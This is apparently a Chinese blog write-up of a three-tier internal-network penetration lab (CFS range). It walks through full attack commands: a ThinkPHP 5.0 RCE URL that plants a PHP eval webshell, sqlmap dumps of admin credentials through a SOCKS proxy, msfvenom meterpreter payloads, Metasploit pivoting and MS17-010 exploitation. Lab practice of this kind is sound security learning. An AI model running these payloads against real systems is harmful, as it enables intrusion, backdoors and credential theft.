前言
最近学习了内网的一些知识,想着打一下靶场来试试,选择了这个CFS的三层内网靶场,做一下记录
- 靶场下载地址
https://pan.baidu.com/s/1zGw5VNt222nCmfouVWLupQ
提取码:6u5e
首先我们使用nmap对target1进行端口扫描,看看能不能找到什么开放的端口
可以看到,开放了80端口,以及8888端口,80端口是http网站得默认端口,8888端口对应的是宝塔的管理面板,那我们就访问80端口看看是什么页面
是一个thinkPhP5.0的框架,参考了网上文章,v5.0版本存在RCE漏洞:https://blog.csdn.net/qq_45557476/article/details/125275641
可以看到成功的返回信息,那么现在我们就可以网其中写入php一句话代码,因为这是一个靶场所以不需要对小马做免杀,直接echo写入即可
http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20phpinfo(;?%3E%22%20%3E%20info.php
成功了!写入小马http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C?php%20eval($_REQUEST[123];?%3E%27%20%3Eb.php,访问b.php发现文件存在,然后使用蚁剑连接。拿到第一个flag。
2.对target2进行渗透
1生成后门文件
在target1上运行后门文件,可以使用chmod +x对文件进行简单的提权,使其可以运行,然后在kali上使用msf接受会话
开通sock4代理
sqlmap一把梭
sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 --dbs sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D bagecms --tables sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin --columns sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin -C username,password --dump
拿到用户名密码admin 123qwe,可以看到flag
在内容模板写入shell
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf
将马赋执行权限上传到webshell中 同时使用代理开启一个msf
proxychains4 msfconsole
使用代理的msf开启监听
use exploit/multi/handler 使用监听模块 set payload linux/x86/meterpreter/bind_tcp 设置payload set lport 4444 设置接收端口与msfvenoms生成端口一致 set rhost 192.168.22.129 设置目标主机(target2
run autoroute -s 192.168.33.0/24
run autoroute -p
使用msf扫描模块扫描端口
use auxiliary/scanner/portscan/tcp
发现 192.168.33.33 主机并开放 445、3389 敏感端口
msf尝试永恒之蓝
use auxiliary/scanner/smb/smb_ms17_010 检测ms17010是否存在 use exploit/windows/smb/ms17_010_psexe 利用ms17010 use auxiliary/admin/smb/ms17_010_command 这个exp可以执行命令
至此三台靶机shell拿下了